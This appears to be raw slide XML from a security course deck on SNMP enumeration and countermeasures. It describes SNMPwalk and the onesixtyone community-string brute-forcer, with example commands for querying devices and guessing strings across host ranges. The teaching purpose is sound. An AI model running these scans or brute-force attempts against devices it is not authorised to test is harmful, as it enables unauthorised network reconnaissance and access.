                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{33B409A7-54B1-4D21-97A4-EDC5B65233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F8353B-10BE-463C-9874-F604E0AC8568}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{9A93AB9A-8015-4B5C-A3A7-37B614278EC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848B70-6025-4D96-913A-4501528A72F9}"/>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496DA88B-DEAB-4CB5-9AC6-20D17CF42DBF}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{1999A507-2E40-4E34-B7F7-055C8106B9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D35D67B-2E03-49BA-9292-0255F4D031F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="4739887"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{D2164388-5CD2-43C3-B4A0-DC2431807C5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4AC3ECF-5DBD-4D22-AA56-F85DBF47D13D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366"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 &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{064AE01D-9A3A-479A-B373-4289F0075E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A6BFF7-2C56-406E-8EEC-DF5E3AC8C397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
            <a:round/>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1. SNMP Services Enumeration &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 4">
            <a:extLst>
              <a:ext uri="{C4C3A5BC-C077-4071-BD8A-168B5BB520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B32D30F-262A-46C9-A415-B58AF7CDB446}"/>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C2301277-1240-499B-B682-0C282D87E1E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55D8545-324B-1FBB-72DC-3D36E28F176E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0AB5CA20-2328-444F-A6F3-BAAF5E99577B}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA139FEF-A5AD-54F7-55E9-493AFFF79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8828"/>
            <a:ext cx="8305800" cy="4701484"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EDE2EB8-6273-DC5F-2DB8-5910D9126DFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="4525646"/>
            <a:ext cx="426720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01/ demonstration of SNMP BTS (behind the scene) working mechanism</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="967255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491C38D2-E36F-437F-AFC1-7C2B185FBFD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654C47-3DF1-424A-AAFF-ACDC3A9FAF8F}"/>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SNMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Enumeration (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SNMPwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{A94D1D61-C808-40C1-870A-C6846FE74E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67BD56-D365-4527-9927-E400F170ECF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>SNMPwalk is a great tool to query MIB values to retrieve information about managed devices, but, as a minimum, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>it requires a valid SNMP read-only community string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Features                                                                 Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Supports SNMP v1/v2c and SNMPv3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Supports IPv4 and IPv6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Full or partial SNMP variables tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Exports to CSV file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Any type of SNMP variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>. &amp; Privacy protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{80D5A4C0-5A20-4FBB-B728-8900A842DC3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D48BA2-F46F-40EA-A675-1D177C4335EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{8B54C779-7217-4E4C-9E01-C6973500396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32BB30-046A-4554-855E-F6B104AD91EC}"/>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091A90E6-8A8F-49AA-B949-A36D3A5DCB56}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{E5192713-EA25-49D8-BABC-B93FF5ED86E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BD1977-BEB3-48FC-B820-30F5AA7C5156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="4739887"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{79793A50-7E58-439C-A1CB-D4453F3443B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4524C7-B0B8-44A8-A6BD-8FB7055C3E83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366"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 &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{92D8A7C2-4AE3-417F-94F6-0586AE5DCE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889456-94E0-47D9-B5D5-B43444F19677}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4406779" y="2600325"/>
            <a:ext cx="4193200" cy="1679800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="95250" tIns="47625" rIns="95250" bIns="47625" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>SnmpWalk -r:MainRouter -csv &gt; output_file.csv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>SnmpWalk -r:10.0.0.1 -t:10 -c:"admin_rw" -os:.1.3.6.1.2.1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>snmpwalk -c public -v1 $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Basic Format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>snmpwalk -v1 -c &lt;community string&gt; &lt;ip_address&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{81D57B35-8E32-4BA8-B9DE-153295EFD6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AEF34A-EED5-4D24-BC06-14DDC2C87B58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
            <a:round/>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1. SNMP Services Enumeration &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 4">
            <a:extLst>
              <a:ext uri="{233DE425-3D6C-488C-9DF5-38B4796C42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3E643A-6EB2-443F-AD0B-A10A8A92BB65}"/>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DBD6EDB7-852C-4EEB-BFFC-636A1495E09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3">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0">
            <a:extLst>
              <a:ext uri="{AD669C9F-0F46-4533-8518-9E18B41679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4789CB3-2CEE-494A-A6DD-E3CF28F38586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SNMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Enumeration (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>OneSixtyOne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{28ADF9D5-C8BB-4DAB-8C60-2F556BCFF46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16F2CE-05E9-4E25-B410-E3E3D739EB34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Onesixtyone is a very fast tool to brute force SNMP community strings and take advantage of the connectionless protocol. Onesixtyone sends an SNMP request and (by default) waits 10 milliseconds for a response. If the community string sent by onesixtyone to the SNMP enabled device is invalid, then the request is dropped.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>SNMP Scanning: Scans for SNMP-enabled devices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Community String Discovery: Identifies SNMP community strings.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Information Retrieval: Retrieves system information and other SNMP data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Basic Format:-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> onesixtyone [options] &lt;host&gt; &lt;community&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>        E.g., onesixtyone 192.168.4.0/24 public, onesixtyone -c dict.txt -i hosts -o my.log -w 100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{3E1AEE3B-6FA5-4553-B957-A01E433D4AD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91401F-3914-4AE4-9526-63D425266704}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{05E169B8-7A9B-4BC2-AB1F-D523A81CBD2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4847191-024C-415D-97CE-8C2D31181CF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190500" y="4857750"/>
            <a:ext cx="1639570" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="l">
              <a:defRPr lang="en-US" sz="600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{AE53EB12-803F-49FF-8B9D-50C0F9B9FC78}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{EF07EFA7-CAAF-4259-8D9B-ED1057F290D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3772308-9D6C-4EF1-A59C-34E9C0EDF60B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="4739887"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{4F6D71E5-CAAB-452E-86FB-41274D7DDE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F5E9AD-FED7-42DD-8BCE-9AC92BED92EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>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800" b="1" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:rPr>
              <a:t>SNMP Services Enumeration &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{3180B56C-5C2D-4795-A8EF-B57C30F7C7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76C35C-0B18-4E62-94B7-ADCAC6355468}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
